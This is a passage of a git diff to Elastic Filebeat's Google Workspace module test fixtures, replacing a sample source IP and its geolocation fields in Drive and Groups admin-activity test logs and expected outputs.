@@ -1491,7 +1399,7 @@ "event.dataset": "google_workspace.drive", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"acl_change\",\"name\":\"change_document_visibility\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"new_value\",\"value\":\"owner\"},{\"name\":\"old_value\",\"value\":\"writers\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"old_visibility\",\"value\":\"people_within_domain_with_link\"},{\"name\":\"visibility_change\",\"value\":\"external\"},{\"name\":\"target_domain\",\"value\":\"all\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"acl_change\",\"name\":\"change_document_visibility\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document 
title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"new_value\",\"value\":\"owner\"},{\"name\":\"old_value\",\"value\":\"writers\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"old_visibility\",\"value\":\"people_within_domain_with_link\"},{\"name\":\"visibility_change\",\"value\":\"external\"},{\"name\":\"target_domain\",\"value\":\"all\"}]}}", "event.provider": "drive", "event.type": [ "change" @@ -1518,27 +1426,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 17233, + "log.offset": 17210, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "owner" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -1561,7 +1465,7 @@ "event.dataset": "google_workspace.drive", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"acl_change\",\"name\":\"shared_drive_membership_change\",\"parameters\":[{\"name\":\"added_role\",\"value\":\"editor\"},{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"removed_role\",\"value\":\"content_manager\"},{\"name\":\"membership_change_type\",\"value\":\"add_to_shared_drive\"},{\"name\":\"target\",\"value\":\"user@example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"acl_change\",\"name\":\"shared_drive_membership_change\",\"parameters\":[{\"name\":\"added_role\",\"value\":\"editor\"},{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document 
title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"removed_role\",\"value\":\"content_manager\"},{\"name\":\"membership_change_type\",\"value\":\"add_to_shared_drive\"},{\"name\":\"target\",\"value\":\"user@example.com\"}]}}", "event.provider": "drive", "event.type": [ "change" @@ -1587,10 +1491,10 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 18189, + "log.offset": 18165, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", @@ -1598,17 +1502,13 @@ "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -1631,7 +1531,7 @@ "event.dataset": "google_workspace.drive", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"acl_change\",\"name\":\"shared_drive_settings_change\",\"parameters\":[{\"name\":\"new_settings_state\",\"value\":\"restricted\"},{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"old_settings_state\",\"value\":\"unrestricted\"},{\"name\":\"shared_drive_settings_change_type\",\"value\":\"direct_acl\"},{\"name\":\"target\",\"value\":\"user@example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"acl_change\",\"name\":\"shared_drive_settings_change\",\"parameters\":[{\"name\":\"new_settings_state\",\"value\":\"restricted\"},{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document 
title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"old_settings_state\",\"value\":\"unrestricted\"},{\"name\":\"shared_drive_settings_change_type\",\"value\":\"direct_acl\"},{\"name\":\"target\",\"value\":\"user@example.com\"}]}}", "event.provider": "drive", "event.type": [ "change" @@ -1657,10 +1557,10 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 19117, + "log.offset": 19092, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", @@ -1668,17 +1568,13 @@ "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -1701,7 +1597,7 @@ "event.dataset": "google_workspace.drive", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"acl_change\",\"name\":\"sheets_import_range_access_change\",\"parameters\":[{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"sheets_import_range_recipient_doc\",\"value\":\"1234\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"acl_change\",\"name\":\"sheets_import_range_access_change\",\"parameters\":[{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"sheets_import_range_recipient_doc\",\"value\":\"1234\"}]}}", "event.provider": "drive", "event.type": [ "change" 
@@ -1723,27 +1619,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 20060, + "log.offset": 20034, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "owner" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -1766,7 +1658,7 @@ "event.dataset": "google_workspace.drive", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"acl_change\",\"name\":\"change_user_access\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"new_value\",\"value\":\"can_comment\"},{\"name\":\"old_value\",\"value\":\"can_view\"},{\"name\":\"old_visibility\",\"value\":\"people_with_link\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"target_user\",\"value\":\"user@example.com\"},{\"name\":\"visibility\",\"value\":\"private\"},{\"name\":\"visibility_change\",\"value\":\"external\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"acl_change\",\"name\":\"change_user_access\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document 
title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"new_value\",\"value\":\"can_comment\"},{\"name\":\"old_value\",\"value\":\"can_view\"},{\"name\":\"old_visibility\",\"value\":\"people_with_link\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"target_user\",\"value\":\"user@example.com\"},{\"name\":\"visibility\",\"value\":\"private\"},{\"name\":\"visibility_change\",\"value\":\"external\"}]}}", "event.provider": "drive", "event.type": [ "change" @@ -1793,10 +1685,10 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 20815, + "log.offset": 20788, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", @@ -1804,17 +1696,13 @@ "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
diff --git a/x-pack/filebeat/module/google_workspace/groups/test/groups-test.json.log b/x-pack/filebeat/module/google_workspace/groups/test/groups-test.json.log index e67fe7571a3c..5014f5a7063a 100644 --- a/x-pack/filebeat/module/google_workspace/groups/test/groups-test.json.log +++ b/x-pack/filebeat/module/google_workspace/groups/test/groups-test.json.log 
@@ -1,25 +1,25 @@
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"acl_change","name":"change_acl_permission","parameters":[{"name":"acl_permission","value":"can_add_members"},{"name":"group_email","value":"group@example.com"},{"name":"new_value_repeated","multiValue":["managers","members"]},{"name":"old_value_repeated","multiValue":["managers"]}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"accept_invitation","parameters":[{"name":"group_email","value":"group@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"approve_join_request","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"join","parameters":[{"name":"group_email","value":"group@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"request_to_join","parameters":[{"name":"group_email","value":"group@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"change_basic_setting","parameters":[{"name":"basic_setting","value":"allow_external_members"},{"name":"group_email","value":"group@example.com"},{"name":"new_value","value":"true"},{"name":"old_value","value":"false"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"create_group","parameters":[{"name":"group_email","value":"group@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"delete_group","parameters":[{"name":"group_email","value":"group@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"change_identity_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"identity_setting","value":"required_forms_of_identity"},{"name":"new_value","value":"display_name_only"},{"name":"old_value","value":"display_name_or_google_profile"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"add_info_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"info_setting","value":"custom_footer"},{"name":"value","value":"footer"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"change_info_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"info_setting","value":"custom_footer"},{"name":"new_value","value":"footer"},{"name":"old_value","value":"old footer"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"remove_info_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"info_setting","value":"custom_footer"},{"name":"value","value":"footer"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"change_new_members_restrictions_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"new_members_restrictions_setting","value":"new_members_can_post"},{"name":"new_value","value":"inherit"},{"name":"old_value","value":"overriden_to_false"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"change_post_replies_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"post_replies_setting","value":"where_should_replies_be_sent"},{"name":"new_value","value":"reply_to_custom_address"},{"name":"old_value","value":"reply_to_author_only"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"change_spam_moderation_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"spam_moderation_setting","value":"how_to_handle_suspected_spam_messages"},{"name":"new_value","value":"moderate_and_do_not_send_notifications"},{"name":"old_value","value":"moderate_and_send_notifications"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"change_topic_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"topic_setting","value":"allowed_topic_types"},{"name":"new_value","value":"discussions_questions"},{"name":"old_value","value":"discussions"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"moderate_message","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"message_moderation_action","value":"approved"},{"name":"status","value":"succeeded"},{"name":"message_id","value":"message id"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"always_post_from_user","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"},{"name":"status","value":"succeeded"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"add_user","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"},{"name":"member_role","value":"manager"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"ban_user_with_moderation","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"},{"name":"member_role","value":"manager"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"revoke_invitation","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"invite_user","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"reject_join_request","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"reinvite_user","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"remove_user","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"acl_change","name":"change_acl_permission","parameters":[{"name":"acl_permission","value":"can_add_members"},{"name":"group_email","value":"group@example.com"},{"name":"new_value_repeated","multiValue":["managers","members"]},{"name":"old_value_repeated","multiValue":["managers"]}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"accept_invitation","parameters":[{"name":"group_email","value":"group@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"moderator_action","name":"approve_join_request","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"}]}}
